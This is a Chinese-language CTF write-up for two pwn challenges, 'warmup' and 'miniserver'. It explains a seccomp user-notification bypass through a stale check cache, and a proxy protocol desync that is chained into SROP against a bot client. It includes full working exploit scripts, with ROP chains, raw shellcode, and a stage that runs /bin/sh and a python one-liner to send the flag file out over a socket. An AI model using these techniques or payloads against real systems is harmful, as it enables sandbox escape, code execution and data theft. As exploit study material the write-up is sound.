warmup


dokerfile,程序由 xinetd 启动,flag 位于 /flag

stripped 静态链接 ELF,没有 main 符号,所以要从入口点找


典型 glibc _start 逻辑
x86-64 下第一个参数放在 rdi,所以:
mov rdi, 0x402f20
说明 main = 0x402f20
main里主要做了socketpair 父进程:处理 seccomp user notification 子进程:安装 seccomp,然后 call 0x403770
子进程有个沙箱控制,触发受管控 syscall 时,父进程会收到通知并决定是否放行

父进程对 open(2) 做了特殊检查:这里父进程会读取子进程地址 0x13370000 的内容是不是输入了 dobedobedo再决定是否放行syscall

也就是说,正常直接 open(“/flag”) 会失败,因为父进程检查的固定地址不是 /flag
403770这里有个明显的栈溢出漏洞,可以直接布置ROP,它是在子进程分支最后被调用的

关键点在于父进程用于检查的缓存没有被清空。
利用流程如下:
- 先在
0x13370000写入dobedobedo\x00。 - 调用一次
open(0x13370000, 0, 0),让父进程检查通过,并在父进程缓存中留下dobedobedo。 - 调用
prctl(PR_SET_DUMPABLE, 0)。 - 此后父进程对当前子进程执行
process_vm_readv会失败。 - 将
0x13370000改写为/flag\x00。 - 再次调用
open(0x13370000, 0, 0)。 - 父进程读取失败后复用了旧缓存,误以为内容仍是
dobedobedo,于是放行真实 syscall。 - 内核实际看到的路径已经是
/flag,因此成功打开 flag。
这里还有一个坑:不能直接调用静态 glibc 的 open() wrapper,因为它可能实际走 openat(257);父进程只特判 syscall 号 open(2)。所以第二阶段需要手写:
mov eax, 2
syscall
第一阶段使用 ROP:
mmap(0x13370000, 0x1000, 7, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, ...)
read(0, 0x13370000, 0x400)
jmp 0x13370000
这样可以把 shellcode 读到固定地址并执行。
第二阶段 shellcode:
write "dobedobedo\x00" to 0x13370000
open(0x13370000, 0, 0)
prctl(PR_SET_DUMPABLE, 0)
write "/flag\x00" to 0x13370000
open(0x13370000, 0, 0)
read(fd, 0x13370100, 0x100)
write(1, 0x13370100, n)
exit(0)
EXP
#!/usr/bin/env python3
from pwn import *
context.arch = 'amd64'
context.os = 'linux'
# ./pwn: static, non-PIE, NX; overflow offset = 0x48
SC = 0x13370000
POP_RDI_RBP = 0x40411d # pop rdi ; pop rbp ; ret
POP_RSI = 0x4016a5 # pop rsi ; ret
POP_RDX_M = 0x41de28 # pop rdx ; xor eax,eax ; pop rcx ; pop rbx ; pop r14 ; pop rbp ; ret
POP_RCX = 0x40dc51 # pop rcx ; ret
MMAP = 0x41c150 # mmap wrapper: rdi,rsi,rdx,rcx,r8,r9
READ = 0x41b760 # read wrapper
def set_rdi(x):
return p64(POP_RDI_RBP) + p64(x) + p64(0)
def set_rdx(x, rcx=0):
return p64(POP_RDX_M) + p64(x) + p64(rcx) + p64(0) + p64(0) + p64(0)
# Stage 1: mmap(0x13370000, 0x1000, RWX, MAP_FIXED|MAP_PRIVATE|MAP_ANON),
# read(0, 0x13370000, 0x400), then jump there.
payload = b'A' * 0x48
payload += set_rdi(SC)
payload += p64(POP_RSI) + p64(0x1000)
payload += set_rdx(7)
payload += p64(POP_RCX) + p64(0x32) # MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS
payload += p64(MMAP)
payload += set_rdi(0)
payload += p64(POP_RSI) + p64(SC)
payload += set_rdx(0x400)
payload += p64(READ)
payload += p64(SC)
# Stage 2 shellcode:
# 1. Put "dobedobedo\0" at 0x13370000 and call open() once to poison parent's cache.
# 2. prctl(PR_SET_DUMPABLE, 0), so parent's process_vm_readv() fails later.
# 3. Replace the same address with "/flag\0" and call open() again. Parent reuses the stale cache
# and sends SECCOMP_USER_NOTIF_FLAG_CONTINUE, so the real kernel open sees /flag.
# 4. read/write flag.
sc = bytes.fromhex(
'48c7c700003713' # mov rdi, 0x13370000
'48b8646f6265646f6265' # mov rax, "dobedobe"
'488907' # mov [rdi], rax
'c74708646f0000' # mov dword [rdi+8], "do\0\0"
'b80200000031f631d20f05' # open("dobedobedo", 0, 0)
'b89d000000bf0400000031f631d2' # prctl(PR_SET_DUMPABLE, 0, ...)
'4531d24531c00f05'
'48c7c700003713' # mov rdi, 0x13370000
'48b82f666c6167000000' # mov rax, "/flag\0"
'488907' # mov [rdi], rax
'b80200000031f631d20f05' # open("/flag", 0, 0)
'4889c7' # mov rdi, rax
'48c7c600013713' # mov rsi, 0x13370100
'ba0001000031c00f05' # read(fd, buf, 0x100)
'89c2bf01000000b8010000000f05' # write(1, buf, n)
'31ffb83c0000000f05' # exit(0)
)
def start():
if len(sys.argv) >= 3:
return remote(sys.argv[1], int(sys.argv[2]))
return process('./pwn')
io = start()
io.send(payload)
# vuln echoes the first read back; consume it so stage-2 is sent to the ROP read().
io.recvn(len(payload), timeout=3)
io.send(sc)
io.interactive()

miniserver
题目主要由三部分组成
client是交互式 note 客户端,bot 实际运行的就是它。
proxy是对外监听,把多个外部连接复用到一条后端连接。
server是真正维护用户、note、登录态和协议处理逻辑的后端

bot 会不断启动 ./client,注册随机用户,然后周期性执行 Show note,固定查看 index 0
三端之间使用的是固定头部 + 变长 payload + 0xff 结束符的协议:
struct msg {
uint32_t length;
uint32_t type;
uint32_t route;
uint32_t key;
uint8_t payload[length];
uint8_t end; // 0xff
}
关键字段含义如下:
type:消息类型,包含注册、登录、增删查 note 等。route:proxy内部用于把响应路由回对应客户端 fd。key:用户 uid。
题目的一个重要逻辑漏洞是:server在做 note 操作时只信包里的 key/uid,没有把用户身份和底层连接绑定起来。也就是说,只要知道目标 uid,就可以伪造它的增删查 note 请求。
proxy 会把多个客户端的数据复用到同一条到 server的后端连接。
而 server 读取消息时,会先读 16 字节头,然后按 length 继续读消息体。只要我们发送一个“声明长度大于实际发送长度”的包,server就会在这条共享连接上继续等剩余字节。
这时其他客户端后续发送的数据,包括 bot 的请求,就会被拼进我们这个未完成消息的 body 里,导致协议流错位。
利用这个短读陷阱,我们可以吞掉 bot 发出的 show note 0 请求,再把这段被吞进去的原始数据读出来。
从被吞掉的请求里,我们可以恢复出:
- bot 当前在 proxy内部对应的客户端 fd
- bot 当前登录用户的 uid
这两项数据是后续伪造响应路由的基础。
短读抓到的 bot 请求,在 payload 里可以解析成:
len = 1
type = 4
route = bot_fd
uid = bot_uid
data = "0"
第二个漏洞是client的 show_note() 在收到服务端返回的 note 内容后,会把内容拷到栈上的固定缓冲区里。
这里目的地址是固定大小的栈缓冲区,但 memcpy 的长度完全来自服务端消息头,因此只要 bot 收到一个足够长的 note 响应,就会直接覆盖返回地址,属于栈溢出

所以目标非常明确:想办法控制 bot 收到的 show_note() 响应,让它在展示 note 的时候进入栈溢出
最终利用链可以概括成下面四步:
- 注册几个我们自己的账号,分别存放 stage1、stage2 和陷阱数据。
- 用短读陷阱抓出 bot 的 fd + uid。
- 在共享流上伪造多个 request_note 请求,让这些请求生成的响应被 proxy路由进 bot 的 socket。
- 通过 stage1 -> stage2 两段 SROP,让 bot 自己去读 flag,再把 flag 写回到我们控制的账号里。
stage1是第一段栈溢出触发器
它覆盖返回地址后,利用:
pop rdi; retstrlen@plt- 一个可用的
syscallgadget
先让 rax = 15,再触发 rt_sigreturn。
构造出的 sigframe 最终执行:
recv(3, BSS, len(stage2_msg), MSG_WAITALL)
也就是说,第一阶段的目标是让 bot 从自己当前和 proxy 相连的 socket 上,继续以原始协议格式读下一条完整消息到 .bss,再把执行流切过去。
stage2 也是 SROP。
它最终执行的是:
/bin/sh -c "python3 -c '...'"
这段 one-liner 会做下面几件事:
- 回连到 127.1:9999
- 注册一个随机 loot 用户
- 打开 flag
- 调用协议里的 add_note,把 flag 内容作为新的 note 写进去
之后 exploit 只要再去登录这个 loot 用户并读 note,就能拿到 flag。
这题的卡点不在 ROP 本身,而在 show_note() 的调用顺序。
一次 Show note 0并不是只发一条请求,而是两条:
- 先进入 lenof_note(),拿当前 note 数量。
- 然后才真正发请求拿 index 0 的内容。
这两个阶段在协议层看起来非常像,抓到的请求都可能表现成:
type = 4
payload = "0"
所以单靠吞到的原始字节,很难判断我们当前抓到的是“数量阶段”还是“内容阶段”。
如果相位判断错了,就会出现典型失败模式:
stage1被错误地当成 count 响应先吃掉- 真正进入
memcpy的内容响应却是别的数据 - bot 不崩、不挂、不出 flag,看起来像“打到了但没完全打到”
为了解决这个相位歧义,最终 exploit 没有只发送一组简单的:
count -> stage1 -> stage2
而是发送了一组“对当前相位不敏感”的批量响应:
[
(stage1_uid, 1),
(stage2_uid, 1),
(stage1_uid, 0),
(stage1_uid, 1),
(stage2_uid, 1),
]
也就是:
stage1, stage2, count, stage1, stage2
这样设计的原因是:如果当前 bot 卡在内容阶段,前两个响应就直接构成 stage1 -> stage2。
如果当前 bot 卡在数量阶段,前两个响应只会被安全消耗,下一轮自然会落成 count -> stage1 -> stage2。
可以概括为:
- 生成随机
loot_user。 - 构造 stage1、stage2。
- 注册两个用户,分别保存
stage1 note和stage2 note。 - 再注册一个陷阱用户,用于短读捕获 bot 的请求。
- 解析出 bot 当前的
fd + uid。 - 用 deliver_notes_to_fd()一次性塞进那组 phase-independent forged batch。
- 等待 stage2 通过回连把 flag 写进 loot_user的 note。
- 轮询登录 loot_user 并读取 note,直到拿到 flag。
EXP
#!/usr/bin/env python3
import os
import socket
import struct
import sys
import time
def u32(b):
return struct.unpack("<I", b)[0]
def p64(x):
return struct.pack("<Q", x & ((1 << 64) - 1))
def pack_msg(op, payload=b"", route=0, key=0):
return struct.pack("<IIII", len(payload), op, route, key) + payload + b"\xff"
def recv_msg(sock, timeout=2):
sock.settimeout(timeout)
hdr = b""
while len(hdr) < 16:
chunk = sock.recv(16 - len(hdr))
if not chunk:
raise EOFError("closed")
hdr += chunk
length, op, route, key = struct.unpack("<IIII", hdr)
data = b""
while len(data) < length + 1:
chunk = sock.recv(length + 1 - len(data))
if not chunk:
raise EOFError("closed in body")
data += chunk
if data[-1:] != b"\xff":
raise ValueError("bad terminator")
return length, op, route, key, data[:-1]
def raw_msg_noff(op, payload=b"", route=0, key=0):
return struct.pack("<IIII", len(payload), op, route, key) + payload
def send_msg(sock, op, uid=0, payload=b"", echo=0, length_override=None):
msg = struct.pack(
"<IIII",
len(payload) if length_override is None else length_override,
op,
echo,
uid,
) + payload + b"\xff"
sock.sendall(msg)
POP_RDI = 0x402F09
STRLEN = 0x402380
RECV = 0x402350
SYSCALL = 0x40448D
LEN15 = 0x40709E
BSS = 0x40A800
OFFSET = 0x43F
MSG_WAITALL = 0x100
def sigframe(
rax=0,
rdi=0,
rsi=0,
rdx=0,
rcx=0,
rsp=0,
rip=0,
r8=0,
r9=0,
r10=0,
r11=0,
r12=0,
r13=0,
r14=0,
r15=0,
rbp=0,
rbx=0,
eflags=0x202,
):
buf = bytearray(0x130)
def q(off, val):
buf[off : off + 8] = p64(val)
base = 0x28
regs = [
r8,
r9,
r10,
r11,
r12,
r13,
r14,
r15,
rdi,
rsi,
rbp,
rbx,
rdx,
rax,
rcx,
rsp,
rip,
eflags,
]
for i, val in enumerate(regs):
q(base + i * 8, val)
q(base + 18 * 8, 0x2B000000000033)
return bytes(buf)
def build_stage2(user):
cmd = (
b'python3 -c "import socket,struct as S;'
b"p=lambda t,d,k=0:S.pack('<IIII',len(d),t,0,k)+d+b'\\\\xff';"
b"s=socket.create_connection(('127.1',9999));"
b"u=b'"
+ user
+ b"';s.sendall(p(0,u));"
b"r=b'';\nwhile len(r)<19:r+=s.recv(19-len(r));\n"
b"k=S.unpack('<IIII',r[:16])[3];"
b's.sendall(p(2,open(\'flag\',\'rb\').read(),k))" '
)
if len(cmd) >= 0x150:
raise ValueError("command too long: %d" % len(cmd))
base = BSS + 0x10
len15_off = 0x250
binsh_off = 0x260
dashc_off = 0x268
cmd_off = 0x270
argv_off = 0x3C0
blob = bytearray()
blob += p64(POP_RDI) + p64(base + len15_off) + p64(STRLEN) + p64(SYSCALL)
blob += sigframe(rax=59, rdi=base + binsh_off, rsi=base + argv_off, rdx=0, rsp=base + 0x700, rip=SYSCALL)
if len(blob) < len15_off:
blob += b"B" * (len15_off - len(blob))
blob += b"X" * 15 + b"\x00"
if len(blob) < binsh_off:
blob += b"C" * (binsh_off - len(blob))
blob += b"/bin/sh\x00"
if len(blob) < dashc_off:
blob += b"D" * (dashc_off - len(blob))
blob += b"-c\x00"
if len(blob) < cmd_off:
blob += b"E" * (cmd_off - len(blob))
blob += cmd + b"\x00"
if len(blob) < argv_off:
blob += b"F" * (argv_off - len(blob))
blob += p64(base + binsh_off) + p64(base + dashc_off) + p64(base + cmd_off) + p64(0)
assert len(blob) < 0x40F, len(blob)
return bytes(blob)
def build_payloads(user):
stage2 = build_stage2(user)
stage2_msg = pack_msg(1, stage2)
frame = sigframe(rax=0, rdi=3, rsi=BSS, rdx=len(stage2_msg), rcx=MSG_WAITALL, rsp=BSS + 0x10, rip=RECV)
stage1 = b"A" * OFFSET + p64(POP_RDI) + p64(LEN15) + p64(STRLEN) + p64(SYSCALL) + frame
return stage1, stage2, stage2_msg
def connect(host, port, timeout=5):
s = socket.create_connection((host, port), timeout=timeout)
s.settimeout(timeout)
return s
def register(host, port, name):
s = connect(host, port)
s.sendall(pack_msg(0, name))
_length, _op, _route, key, data = recv_msg(s)
if data != b"OK":
raise RuntimeError("register failed: %r" % (data,))
return s, key
def login(sock, name):
sock.sendall(pack_msg(1, name))
_length, _op, _route, key, data = recv_msg(sock)
if data != b"OK":
return None
return key
def add_note(host, port, uid, data):
s = connect(host, port)
try:
s.sendall(pack_msg(2, data, key=uid))
if recv_msg(s, 2)[4] != b"OK":
raise RuntimeError("add_note failed")
finally:
s.close()
def del_note(host, port, uid, idx):
s = connect(host, port)
try:
send_msg(s, 3, uid=uid, payload=str(idx).encode())
return recv_msg(s, timeout=3)
finally:
s.close()
def request_note(host, port, uid, idx):
s = connect(host, port)
try:
s.sendall(pack_msg(4, str(idx).encode(), key=uid))
return recv_msg(s, timeout=2)
finally:
s.close()
def parse_swallowed_show(blob):
for off in range(0, max(0, len(blob) - 16)):
if off + 17 > len(blob):
break
n = u32(blob[off : off + 4])
op = u32(blob[off + 4 : off + 8])
if n == 1 and op == 4 and off + 17 <= len(blob) and blob[off + 16 : off + 17] == b"0":
return {
"offset": off,
"fd": u32(blob[off + 8 : off + 12]),
"uid": u32(blob[off + 12 : off + 16]),
}
return None
def short_trap(host, port, uid, declared_len=19, prefix=b"A"):
s = connect(host, port, timeout=10)
hdr = struct.pack("<IIII", declared_len, 2, 0, uid)
s.sendall(hdr)
s.sendall(prefix)
time.sleep(0.08)
s.sendall(b"\xff")
return s
def clear_pending_trap(host, port, count=1):
for _ in range(count):
try:
s = connect(host, port, timeout=3)
send_msg(s, 2, uid=0, payload=b"\xff")
time.sleep(0.05)
s.close()
except Exception:
pass
def capture_bot_route(host, port, tries=8):
for i in range(tries):
name = b"cap" + os.urandom(4).hex().encode()
me, uid = register(host, port, name)
me.close()
del_note(host, port, uid, 0)
trap = short_trap(host, port, uid, 19, b"A")
try:
recv_msg(trap, timeout=8)
except Exception:
trap.close()
clear_pending_trap(host, port)
continue
trap.close()
try:
r = request_note(host, port, uid, 0)
except Exception:
continue
info = parse_swallowed_show(r[4])
if info:
return info
time.sleep(0.5)
raise RuntimeError("failed to capture bot fd/uid")
def forged_request(host, port, trap_uid, route_fd, op, key, payload):
forged_request_many(host, port, trap_uid, route_fd, [(op, key, payload)])
def forged_request_many(host, port, trap_uid, route_fd, requests):
forged_items = [raw_msg_noff(op, payload, route=route_fd, key=key) for op, key, payload in requests]
declared = 1 + 1 + 16
a = connect(host, port, timeout=5)
a.sendall(struct.pack("<IIII", declared, 2, 0, trap_uid))
a.sendall(b"X")
time.sleep(0.35)
a.sendall(b"\xff")
time.sleep(0.18)
b_payload = b"\xff" + b"\xff".join(forged_items)
b = connect(host, port, timeout=5)
send_msg(b, 2, uid=trap_uid, payload=b_payload)
try:
recv_msg(a, timeout=3)
except Exception:
pass
a.close()
b.close()
def deliver_note_to_fd(host, port, trap_uid, route_fd, note_uid, idx=1):
forged_request(host, port, trap_uid, route_fd, 4, note_uid, str(idx).encode())
def deliver_notes_to_fd(host, port, trap_uid, route_fd, note_indexes):
reqs = [(4, note_uid, str(idx).encode()) for note_uid, idx in note_indexes]
forged_request_many(host, port, trap_uid, route_fd, reqs)
def route_payload_message(host, port, route_fd, payload):
note_sock, note_uid = register(host, port, b"rp" + os.urandom(4).hex().encode())
note_sock.close()
add_note(host, port, note_uid, payload)
trap_sock, trap_uid = register(host, port, b"rt" + os.urandom(4).hex().encode())
trap_sock.close()
deliver_note_to_fd(host, port, trap_uid, route_fd, note_uid, 1)
def reset_waiting_bot(host, port, fd_min=5, fd_max=10):
dummy_payload = b"B" * 992
for fd in range(fd_min, fd_max + 1):
try:
route_payload_message(host, port, fd, dummy_payload)
except Exception:
pass
time.sleep(6)
def try_get_flag(host, port, loot_user):
try:
s = connect(host, port, timeout=3)
uid = login(s, loot_user)
if uid is None:
s.close()
return None
for idx in range(1, 4):
try:
s.sendall(pack_msg(4, str(idx).encode(), key=uid))
r = recv_msg(s, timeout=2)
if b"flag{" in r[4] or b"JQCTF" in r[4] or b"{" in r[4]:
s.close()
return r[4]
except Exception:
pass
s.close()
except Exception:
return None
return None
def solve_remote(host, port):
loot_user = b"loot" + os.urandom(4).hex().encode()
print("[*] loot user:", loot_user.decode(), flush=True)
stage1, stage2, _stage2_msg = build_payloads(loot_user)
print("[*] stage sizes:", len(stage1), len(stage2), flush=True)
stage1_sock, stage1_uid = register(host, port, b"s1" + os.urandom(4).hex().encode())
stage1_sock.close()
add_note(host, port, stage1_uid, stage1)
stage2_sock, stage2_uid = register(host, port, b"s2" + os.urandom(4).hex().encode())
stage2_sock.close()
add_note(host, port, stage2_uid, stage2)
trap_sock, trap_uid = register(host, port, b"tr" + os.urandom(4).hex().encode())
trap_sock.close()
info = capture_bot_route(host, port)
bot_fd = info["fd"]
bot_uid = info["uid"]
print(f"[*] captured bot fd={bot_fd} uid={bot_uid:#x}", flush=True)
print("[*] route robust batch", flush=True)
deliver_notes_to_fd(
host,
port,
trap_uid,
bot_fd,
[
(stage1_uid, 1),
(stage2_uid, 1),
(stage1_uid, 0),
(stage1_uid, 1),
(stage2_uid, 1),
],
)
for _ in range(20):
time.sleep(0.5)
flag = try_get_flag(host, port, loot_user)
if flag:
print(flag.decode(errors="replace"), flush=True)
return flag
print("[-] no flag yet", flush=True)
return None
if __name__ == "__main__":
h = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
p = int(sys.argv[2]) if len(sys.argv) > 2 else 9999
solve_remote(h, p)
flag{8166bd68-bad8-4a4e-976d-6a05179fd519}









